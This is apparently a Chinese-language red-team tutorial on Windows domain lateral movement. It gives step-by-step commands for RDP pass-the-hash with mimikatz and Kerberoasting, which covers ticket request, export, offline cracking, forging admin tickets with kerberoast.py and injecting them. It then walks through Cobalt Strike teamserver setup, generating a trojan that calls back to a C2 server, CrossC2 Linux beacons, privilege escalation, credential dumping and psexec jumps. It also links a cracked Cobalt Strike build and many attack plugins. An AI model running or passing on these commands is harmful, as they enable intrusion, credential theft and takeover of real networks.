域横向RDP-mimikatz
1、RDP明文密码链接
2、RDP密文hash链接
域横向SPN服务-探针,请求,导出,破解,重写
SPN扫描
当计算机加入域时,主SPN会自动添加到域的计算机账号的ServicePrincipalName属性中。在安装新的服务后,SPN也会被记录在计算机账号的相应属性中。
SPN扫描也称为“扫描Kerberos服务实例名称”。在活动目录中发现服务的最佳方法就是SPN扫描。SPN扫描通过请求特定SPN类型的服务主体名称来查找服务。与网络端口扫描相比,SPN扫描的主要特点是不需要通过连接网络中的每个IP地址来检查服务端口(不会因为触发内网中的IPS、IDS等设备的规则而产生大量的警告日志)。因为SPN查询是Kerberos票据行为的一部分,所以检测难度很大。
由于SPN扫描是基于LDAP协议向域控制器进行查询的,所以,攻击者只需要获得一个普通的域用户权限,就可以进行SPN扫描。
在域环境中,发现服务的最好办法就是通过“SPN扫描”通过请求特定SPN类型服务主体名称来查找服务。
域横向移动RDP传递-Mimikatz
除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议(远程桌面)进行链接操作。
判断对方远程桌面服务是否开启(默认:3389),端口扫描判断;win+r:msts
RDP明文密码链接
Windows:mstsc(远程桌面连接)-输入账号密码
Windows命令行:mstsc.exe /console /v:[IP] /admin
Linux:(需要安装rdesktop)rdesktop [IP]
RDP密文HASH链接
windows Server需要开启Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默认开启,同时如果Win 7和Windows Server 2008 R2安装了2871997、2973351补丁也支持,开启命令:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
通过mimikatz链接
mstsc.exe /restrictedadmin
mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:lcn.cn /ntlm:b7f2f7b2491ba316e8cd773f8c2d58df "/run:mstsc.exe /restrictedadmin"
域横向移动SPN服务-探针,请求,导出,破解,重写
https://www.cnblogs.com/backlion/p/8082623.html
黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能够验证用户是否可以访问。请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为Kerberoast攻击。如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。这就是Kerberoasting攻击的关键。
以下操作都在PowerShell进行
1、探针:探测域内主机常见服务
什么权限都可以完成探测
探测域内服务
setspn -q /
寻找特定服务,如MSSQL
setspn -q / | findstr "[服务名]"
找到合适的服务作为攻击目标
2、请求
清空当前机器中的凭证,防止影响下面的操作(可以不删除)
查看已有票据
klist
删除已有票据
klist purge
请求对应服务
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "[服务名]"
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/xiaolu.lcn.cn:1433"
使用mimikatz请求
mimikatz.exe "kerberos::ask /target:[服务名]"
3、导出
导出凭据
mimikatz.exe "kerberos::list /export"
利用mimikatz导出,会导出到mimikatz所在的目录
4、破解(鸡肋)
破解凭据
可以将凭证复制到本地破解,避免提交破解的脚本
使用忍者系统tgsrepcrack.py脚本加爆破字典来破解
将凭据放在脚本文件目录中后
python3 .\tgsrepcrack.py .[密码文件.txt] .[凭据.kirbi]
python3 .\tgsrepcrack.py .\password.txt .[0;3e4]-0-1-40a50000-XIAOLU$@LDAP-WIN-5P9N6179EBS.lcn.cn.kirbi
破解成功会把被攻击的服务账户的明文密码显示出来,再想办法利用密码
5、重写
使用kerberoast.py和密码重写凭据
python kerberoast.py -p [得到的密码] -r [已有的凭据.kirbi] -w [新凭据的名字.kirbi] -u 500
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p [得到的密码] -r [已有的凭据.kirbi] -w [新凭据的名字.kirbi] -g 512
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512
“-u 500”指管理员,“-g 512”指管理员组
6.将生成的票据注入内存
mimikatz.exe kerberos::ptt [票据文件.kirbi]
mimikatz.exe kerberos::ptt xxxx.kirbi
用重写的凭据来链接,不一定成功,且一般只能得到普通用户权限
三、域横向移动测试流程一把梭哈-CobaltStrike初体验
大概流程:
启动-配置-监听-执行-上线-提权-信息收集(网络,凭证,定位等)-渗透
1.关于启动及配置讲解
启动
服务器:
需要Java环境支持
来到CobaltStrike所在的目录
运行“teamserver”,后面是安装CobaltStrike的服务器的IP,而后是工具链接服务器的密码
./teamserver [IP] [密码]
./teamserver 192.168.127.128 lusang lcn123456
客户端:
需要Java环境支持
直接运行“start.bat”,Host为服务器IP,Port为50050,User随便填,Password为刚刚设定的密码,点链接
配置
配置监听器:
选择“Cobalt Strike”“Listeners”
选择“Add”,“Payload”选择木马回连的协议,这里选择HTTP;随便取个名字;“HTTP Host(Stager)”填服务器地址;“HTTP Port(C2)”填回连的端口
生成木马:
选择“Attacks”“Packages”,然后根据需要选择后门类型。这里选择“Windows Executable”,“Output”选择“Windows EXE”,勾选x64。“Listener”选择自己的监听器,点击“Generate”
选择保存木马的位置,填写名字,“保存”。注意会被杀软查杀
执行木马:
想办法将木马传输到目标机器并执行
在“Event Log”会提示对应IP的终端上线了,在Event Log和视图页面可以看见主机的名字和权限
上线linux
安装插件crossc2;
./genCrossC2.Linux 192.168.127.128 5555 ./.cobaltstrike.beacon_keys null Linux x64 t_cc2.out
修改cna文件;
$CC2_PATH = "C:\Users\Administrator.DESKTOP-F148003\Desktop\honey\CS4.4完全汉化版破解\CS4.4完全汉化版破解"; # <-------- fix
$CC2_BIN = "genCrossC2.Linux";
运行t_cc2.out文件,linux‘主机成功上线cs;
2.关于提权及插件加载
在视图界面,选中机器右键。“Interact”,打开命令行终端;“Session”,链接的管理和笔记等功能;中间是包括端口扫描、黄金票据、运行MimiKatz等常用功能
选中机器右键,“Access”“Elevate”即提权功能,但默认只有两种提权方式,需要安装插件
选择合适的EXP和监听器,点击“Launch”提权,成功后会显示在视图界面
安装插件:
选择“Cobalt Strike”“Script Manager”,选择“Load”载入所需插件的.cna文件,将.cna文件“Unload”
提权速度过慢:
选择“Session”“Sleep”,设置为1或者0
3.关于信息收集命令讲解
在视图界面,选中SYSTEM权限的机器右键。“Interact”,打开命令行终端
输入“help”,查看命令
输入“getuid”,获取权限情况
输入“net view”,探测当前的网络环境
选择“View”“Targets”,会展示所有已探测的信息
输入“net computers”,探测所有的机器的名字与IP
输入“net dclist”,获取当前域控的信息
输入“net user”,获取当前用户信息
输入“shell net user /domain”,加“shell”调用cmd执行命令,得到域内所有用户的名字
选择“Access”“Run Mimikatz”或者输入“mimikatz”来运行mimikatz
选择“View”“Credentials”,会展示mimikatz收集的密码信息
回到“Targets”界面,选中一台机器,右键“Jump”,选择合适的攻击方法进攻。这里以“psexec”为例
可以选择收集到的密码来攻击,也可以手动填写,选择合适的监听器和负责攻击的会话,点击“Launch”
自主工具:
可以上传第三方工具,调用cmd执行,借助工具提高效率
代理问题:
确保信息能够传输回来
4.关于视图自动化功能讲解
涉及资源:
kerberos中的spn详解:https://www.cnblogs.com/backlion/p/8082623.html
kerberoast:https://github.com/nidem/kerberoast
taowu-cobalt-strike(插件-小迪精选):https://github.com/pandasec888/taowu-cobalt-strike
Cobalt Strike 4.0手册:https://pan.baidu.com/s/15DCt2Rzg5cZjXnEuUTgQ9Q 提取码:dtm2
红队实战演练环境:https://pan.baidu.com/s/14eVDglqba1aRXi9BGcBbug 提取码:taqu
Erebus(插件-小迪使用):https://github.com/DeEpinGh0st/Erebus
(Cobalt Strike插件):https://github.com/rsmudge/Elevatekit
(Cobalt Strike插件):https://github.com/harleyQu1nn/AggressorScripts
(Cobalt Strike插件):https://github.com/bluscreenofjeff/AggressorScripts
(Cobalt Strike插件):https://github.com/michalkoczwara/aggressor_scripts_collection
(Cobalt Strike插件):https://github.com/vysecurity/Aggressor-VYSEC
(Cobalt Strike插件):https://github.com/killswitch-GUI/CobaltStrike-ToolKit
(Cobalt Strike插件):https://github.com/ramen0x3f/AggressorScripts
(Cobalt Strike插件):https://github.com/FortyNorthSecurity/AggressorAssessor
(Cobalt Strike插件):https://github.com/threatexpress/persistence-aggressor-script
(Cobalt Strike插件):https://github.com/threatexpress/aggressor-scripts
(Cobalt Strike插件):https://github.com/branthale/CobaltStrikeCNA
(Cobalt Strike插件):https://github.com/gaudard/scripts/tree/master/red-team/aggressor
(Cobalt Strike插件):https://github.com/001SPARTaN/aggressor_scripts
(Cobalt Strike插件):https://github.com/Und3rf10w/Aggressor-scripts
(Cobalt Strike插件):https://github.com/rasta-mouse/Aggressor-Script
(Cobalt Strike插件):https://github.com/vysec/Aggressor-VYSEC
(Cobalt Strike插件):https://github.com/threatexpress/aggressor-scripts
(Cobalt Strike插件):https://github.com/threatexpress/red-team-scripts
(Cobalt Strike插件):https://github.com/vysecurity/CVE-2018-4878
(Cobalt Strike插件):https://github.com/harleyQu1nn/AggressorScripts
(Cobalt Strike插件):https://github.com/bluscreenofjeff/AggressorScripts
(Cobalt Strike插件):https://github.com/QAX-A-Team/CobaltStrike-Toolset
(Cobalt Strike插件):https://github.com/ars3n11/Aggressor-Scripts
(Cobalt Strike插件):https://github.com/michalkoczwara/aggressor_scripts_collection
(Cobalt Strike插件):https://github.com/killswitch-GUI/CobaltStrike-Toolkit
(Cobalt Strike插件):https://github.com/ZonkSec/persistence-aggressor-script
(Cobalt Strike插件):https://github.com/rasta-mouse/Aggressor-Script
(Cobalt Strike插件):https://github.com/RhinoSecurityLabs/Aggressor-Scripts
(Cobalt Strike插件):https://github.com/Kevin-Robertson/Inveigh
(Cobalt Strike插件):https://github.com/Genetic-Malware/Ebowla
(Cobalt Strike插件):https://github.com/001SPARTaN/aggressor_scripts
(Cobalt Strike插件):https://github.com/gaudard/scripts/tree/master/red-team/aggressor
(Cobalt Strike插件):https://github.com/branthale/CobaltStrikeCNA
(Cobalt Strike插件):https://github.com/oldb00t/AggressorScripts
(Cobalt Strike插件):https://github.com/p292/Phant0m_cobaltstrike
(Cobalt Strike插件):https://github.com/p292/DDEAutoCS
(Cobalt Strike插件):https://github.com/secgroundzero/CS-Aggressor-Scripts
(Cobalt Strike插件):https://github.com/skyleronken/Aggressor-Scripts
(Cobalt Strike插件):https://github.com/tevora-threat/aggressor-powerview
(Cobalt Strike插件):https://github.com/tevora-threat/PowerView3-Aggressor
(Cobalt Strike插件):https://github.com/threatexpress/persistence-aggressor-script
(Cobalt Strike插件):https://github.com/FortyNorthSecurity/AggressorAssessor
(Cobalt Strike插件):https://github.com/mdsecactivebreach/CACTUSTORCH
(Cobalt Strike插件):https://github.com/C0axx/AggressorScripts
(Cobalt Strike插件):https://github.com/offsecginger/AggressorScripts
(Cobalt Strike插件):https://github.com/tomsteele/cs-magik
(Cobalt Strike插件):https://github.com/bitsadmin/nopowershell
(Cobalt Strike插件):https://github.com/SpiderLabs/SharpCompile 作者:shtome https://www.bilibili.com/read/cv14802167/?spm_id_from=333.999.0.0 出处:bilibili